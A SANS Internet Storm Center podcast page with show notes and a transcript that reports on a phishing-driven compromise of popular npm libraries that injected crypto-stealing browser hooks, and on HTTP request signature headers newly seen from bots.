Podcast Detail

SANS Stormcast Tuesday, September 9th, 2025: Major npm compromise; HTTP Request Signature

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9604.mp3

Podcast Logo
Major npm compromise; HTTP Request Signature
00:00

Major npm compromise
A number of high-profile npm libraries were compromised after developers fell for a phishing email. This compromise affected libraries with a total of hundreds of millions of downloads a week.
https://bsky.app/profile/bad-at-computer.bsky.social/post/3lydioq5swk2y
https://github.com/orgs/community/discussions/172738
https://github.com/chalk/chalk/issues/656#issuecomment-3266894253
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised

HTTP Request Signatures
It looks like some search engines and AI bots are starting to use the HTTP request signature. This should make it easier to identify bot traffic.
https://isc.sans.edu/diary/HTTP%20Request%20Signatures/32266

Podcast Transcript

 Hello and welcome to the Tuesday, September 9th, 2025
 edition of the SANS Internet Storm Centers Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu graduate certificate program in
 Industrial Control Systems Security. Today I do want to
 do things a little bit different. Usually I start
 with the diary of the day, but there has been a major
 compromise of NPM libraries. So I want to give that a
 little bit of more prominent position. The issue here is
 that in particular one developer, he goes in NPM
 under QIX or Quix, Josh Junon, has been affected by this
 particular compromise. And as a result, some major, major
 NPM libraries have been compromised. So for example,
 the error-ex library with 47 million downloads per week,
 the color name with 199 million downloads per week.
 Many, many other libraries sort of in the millions of
 downloads per week range have been compromised and have been
 infected, if you want to call it that way or substituted
 with libraries that are including browser hijack
 functions. The hijacked libraries are essentially
 intercepting calls to XMLHTTPrequest and fetch. They're
 looking for requests that are then going to crypto coin
 related domains and are replacing them with sort of
 again, lookalike domains. And with the goal of intercepting
 things like crypto coin keys and usernames, passwords and
 the like. So that appears to be the main motivation behind
 this attack. Now, how can something like this happen to
 a major developer like this? Well, the problem here was yet
 again phishing. The email came from support at npmjs.help.
 The normal domain would be a .com domain, but of course the
 attacker owns the domain and with that they were able to
 then basically send these emails without typically
 triggering any spam filters. The domain npmjs.help was
 registered relatively recently and well, it was then used to
 not just get passwords from quicks, but also from other
 prominent and also less prominent of course, npm
 developers and all of these accounts for compromise. It
 was not just the one account, just the one account that
 Josh's account here was the most prominent one with all
 the popular libraries that Josh maintains and has access
 to. How do you defend against this? Well, I'm going to add
 the link in the show notes, a link to aikido.dev. That's one
 website that wrote about this particular attack. They were
 one of the tools that detected this. They weren't the only
 ones. I think SNCC also published something and
 blocked some of these enlarge. SonarType may have done some
 of that. It's all still pretty new at this point when I'm
 recording this, but there was more than one tool that was
 able to detect what exactly happened here. And well, so
 what kind of happened was fairly obvious. If you look at
 it, sort of obfuscated line was added to the these
 packages. It was sort of a constant and with sort of
 hexadecimal variable names. So certainly something that
 probably should have raised people's spidey senses. If you
 look at these, the code, but of course, nobody ever can
 really look manually at the code. That's why these tools
 are important. And a new version was also released of
 the tool. If you log in your versions, that sort of can
 help. And then, you know, more deliberately update after a
 particular new version has been live for a little while
 and was basically the community. The community had a
 chance to raise alerts like this about any compromised
 libraries that were used here to replace existing libraries.
 The technique, very common. The phishing, very common with
 prior NPM compromises. Just in this particular case, they got
 more lucky by actually hitting some real big time libraries.
 And well, it's not every time that when we talk about HTTP
 security and our honeypot that we are actually not talking
 about a new attack, but a new security features. For the
 first time now, we have seen in our honeypots requests with
 the HTTP request signatures headers. This is a relatively
 new feature was standardized in our RFC February last year,
 and it introduced three new headers, signature input,
 signature agent and signature. The purpose of this particular
 feature is to allow the source declined to digitally sign
 part or the entire request. In what we have seen basically
 just the host header is being digitally signed here, but it
 could, for example, also include a signature for the
 user agent and the like. And the reason behind this is
 like, no, we do have TLS of course. TLS can be used with
 client certificates to make sure that a request comes from
 an authorized client. But what this year is trying to solve
 here is that when you have search engines, in particular,
 other bots spidering the Internet interacting with your
 web server, it can be difficult for the server to
 identify which bot sent a particular request. For
 example, with Google, Google has its user agent header, but
 of course, that's not sufficient to verify that this
 comes from Google. We also have to then reverse resolve
 the IP address and make sure it's actually a Google owned
 IP address and a Google owned IP address that it uses for
 its bots with Google. With Google, that works pretty
 well. But of course, it's not a standard and doesn't really
 work well with some of the smaller players in sort of
 search engine or now also AI agents, for example, that are
 starting to spider the Internet more and more. So
 what this feature allows is it allows digital signatures for
 headers and also the entire request. But typically it's
 being limited to specific headers. What we have seen
 here in our example was a request that did really just
 sign the authority header, which is the host header. And
 then the signature agent header, which is the header
 that tells you where to get the keys from. If you want to
 allow specific bots to spider your site, then you can use
 this mechanism to make sure that this bot is actually one
 of these authorized bots. You don't have to rely on IP
 addresses. You don't have to rely on user agent headers,
 all of which can be tricky to figure out. In particular, if
 you do, for example, have multiple proxies to request
 ghost throws, then the original IP address often gets
 lost or gets added to an untrusted header like an X
 forwarded for header that you shouldn't really use to
 identify the source of a particular request. So
 interesting feature and interesting to also see that
 now being used in real life, even though I don't have seen
 really the big users using it. I've seen some notes that
 OpenAI is using it, which I personally haven't seen yet,
 but haven't also looked that closely yet at OpenAI
 requests. Well, and that's it for today. So thanks again for
 listening. Thanks for liking and thanks for recommending
 this podcast and talk to you again tomorrow. Bye.
 Bye.